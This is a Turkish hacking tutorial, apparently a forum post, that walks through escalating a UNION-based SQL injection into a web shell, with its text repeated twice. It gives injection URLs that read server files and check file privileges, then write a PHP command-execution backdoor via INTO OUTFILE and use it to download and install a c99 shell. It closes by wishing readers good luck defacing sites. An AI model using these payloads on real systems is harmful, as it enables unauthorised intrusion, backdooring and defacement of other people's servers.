Bütün SQL injection yapanların kabusu olan tek şey admin tablosunun olmaması
şimdi o sıkıntımızı kaldırıyoruz
)
nasıl olduğuna bakalım
SQLI ile shell yüklemek
farzedinki 3 kolon var 2. si yansıdı
öncelikle bulduğunuz kolonlardan ekrana yansıyanların her hangi birine
load_file('/a/b') tarzında bir komut deneyelim
ornek.ornek/a.php?id='2+union+all+select+1,load_file('/a/b'),3--
sırada şu an zayıflığın mevcut olduğu sunucu yöneticisinin yetkilerine bakalım
ornek.ornek/a.php?id='2+union+all+select+1,current_user,3--
kullanıcı ajanlar diye çıktı farzedelim şimdi ne yetkisi var bakalım
ornek.ornek/a.php?id='2+union+all+select+1,file_priv,3+from+mysql.user+where+user='ajanlar'--
eğer 2 kolonu yerine Y yazarsa ne ala yazmazsa yapacak bir şey gelmez elden
Y yazanlar benimle devam
ornek.ornek/a.php?id='2+union+all+select+1,load_file('/etc/ajanlar.conf'),3--
buradan ise root yolunu aldık
/www/root olsun
lfi açığındaki gibi gire çıka yazılabilen bir dizin bulun ardından
ornek.ornek/a.php?id='2+union+all+select+1,"<?system($_REQUEST['cmd']);?>",3 into outfile '/home/site/public_html/zayif_dizin/ajanlar.php'--+
Eveeet sonlara doğru geldik çay vakti yakın
ornek.ornek/ajanlar/zayif_dizin/ajanlar.php?cmd=wget txt_shell_adresin
şimdi çalıştıralım
ornek.ornek/ajanlar/zayif_dizin/ajanlar.php?cmd=mv c99.txt c99.php
shell hazır
ornek.ornek/ajanlar/zayif_dizin/ajanlar_Shell.php
artık hayırlı uğurlu şekilde index basarsınız sorunlar için mesaj atabilirsiniz
şimdi o sıkıntımızı kaldırıyoruz
) nasıl olduğuna bakalım
SQLI ile shell yüklemek
farzedinki 3 kolon var 2. si yansıdı
öncelikle bulduğunuz kolonlardan ekrana yansıyanların her hangi birine
load_file('/a/b') tarzında bir komut deneyelim
ornek.ornek/a.php?id='2+union+all+select+1,load_file('/a/b'),3--
sırada şu an zayıflığın mevcut olduğu sunucu yöneticisinin yetkilerine bakalım
ornek.ornek/a.php?id='2+union+all+select+1,current_user,3--
kullanıcı ajanlar diye çıktı farzedelim şimdi ne yetkisi var bakalım
ornek.ornek/a.php?id='2+union+all+select+1,file_priv,3+from+mysql.user+where+user='ajanlar'--
eğer 2 kolonu yerine Y yazarsa ne ala yazmazsa yapacak bir şey gelmez elden
Y yazanlar benimle devam
ornek.ornek/a.php?id='2+union+all+select+1,load_file('/etc/ajanlar.conf'),3--
buradan ise root yolunu aldık
/www/root olsun
lfi açığındaki gibi gire çıka yazılabilen bir dizin bulun ardından
ornek.ornek/a.php?id='2+union+all+select+1,"<?system($_REQUEST['cmd']);?>",3 into outfile '/home/site/public_html/zayif_dizin/ajanlar.php'--+
Eveeet sonlara doğru geldik çay vakti yakın
ornek.ornek/ajanlar/zayif_dizin/ajanlar.php?cmd=wget txt_shell_adresin
şimdi çalıştıralım
ornek.ornek/ajanlar/zayif_dizin/ajanlar.php?cmd=mv c99.txt c99.php
shell hazır
ornek.ornek/ajanlar/zayif_dizin/ajanlar_Shell.php
artık hayırlı uğurlu şekilde index basarsınız
sorunlar için mesaj atabilirsiniz
